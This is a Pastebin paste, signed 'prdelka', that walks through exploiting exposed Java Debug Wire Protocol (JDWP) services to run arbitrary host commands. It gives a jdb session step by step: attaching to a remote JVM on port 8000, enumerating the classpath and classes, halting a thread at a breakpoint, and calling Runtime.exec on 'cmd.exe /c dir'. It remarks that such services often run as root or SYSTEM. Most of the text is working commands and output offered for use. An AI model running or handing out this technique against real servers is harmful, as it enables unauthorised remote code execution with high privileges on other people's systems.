Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- JDWP Arbitrary Java Code Execution Exploitation
- ===============================================
- Java Debugging Wire Protocol (JDWP) is the lowlevel protocol used for
- communication between a debugger and a Java Virtual Machine (JVM) as outlined in
- the Java Platform Debugger Architecture. It is often used to facilitate remote
- debugging of a JVM over TCP/IP and can be identified by the initial protocol
- handshake ascii string "JDWP-Handshake", sent first by the client and responded
- to by the server. "jdb" is a proof-of-concept JDWP capable debugger included in
- Oracle JDK and OpenJDK which can be used to interact with remote JDWP capable
- services. Typically this service runs on TCP port 8000 however it can be found
- to run on arbitrary TCP ports and is sometimes found enabled inadvertantly on
- servers running Java services. It is possible to use this utility to exploit
- remote JVM's and execute arbitrary Java code. An example shown here outlines
- how to leverage this weakness to execute arbitrary host OS commands in the
- context of the JVM.
- $ jdb -attach x.x.x.x:8000
- Set uncaught java.lang.Throwable
- Set deferred uncaught java.lang.Throwable
- Initializing jdb ...
- >
- Information leaks can be leveraged to determine details about the remote OS
- platform and Java installation configuration through the "classpath" command.
- > classpath
- base directory: C:\Windows\system32
- classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
- bootclasspath: [ ** MASKED ** list of JRE paths ]
- >
- jdb is capable of performing remote object creation and method invokation from
- within the CLI using the "print" "dump" and "eval" commands with the "new"
- keyword. To determine the classes and methods available use the "classes" and
- then "methods" on the corrosponding class.
- > classes
- ...
- java.lang.Runtime
- ...
- > methods java.lang.Runtime
- ...
- java.lang.Runtime exec(java.lang.String[])
- ...
- It is often necessary to set the JDB context to be within a suspended thread or
- breakpoint before attempting to create a new remote object class. Using the
- "trace go methods" function can be used to identify a candidate for a breakpoint
- and then "stop in your.random.class.method()" to halt the execution of a running
- thread. When the execution is halted you can use "print new" to create your
- class and invoke methods such as in the following example.
- Breakpoint hit: "thread=threadname",your.random.class.method(), line=745 bci=0
- threadname[1] print new java.lang.Runtime().exec("cmd.exe /c dir")
- new java.lang.Runtime().exec("cmd.exe /c dir") = "java.lang.ProcessImpl@918502"
- threadname[1] cont
- >
- Exploitation success will be determined from the output of the JDB process as
- functions returning "null" or errors about "unsuspended thread state" would
- indicate that exploitation was unsuccessful, however in the example above we can
- see that the java created a new object "java.lang.ProcessImpl@918502" indicating
- the "cmd.exe /c dir" was executed with success. On Linux this may need adjusting
- to "java.lang.Runtime.getRuntime().exec()" however see the method / class
- enumeration when attempting to exploit this flaw.
- Your java will be executed in the context of the running JVM application, this
- has been identified on services running as both "root" (*nix) and "SYSTEM"
- (win32) in the wild.
- -- prdelka
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement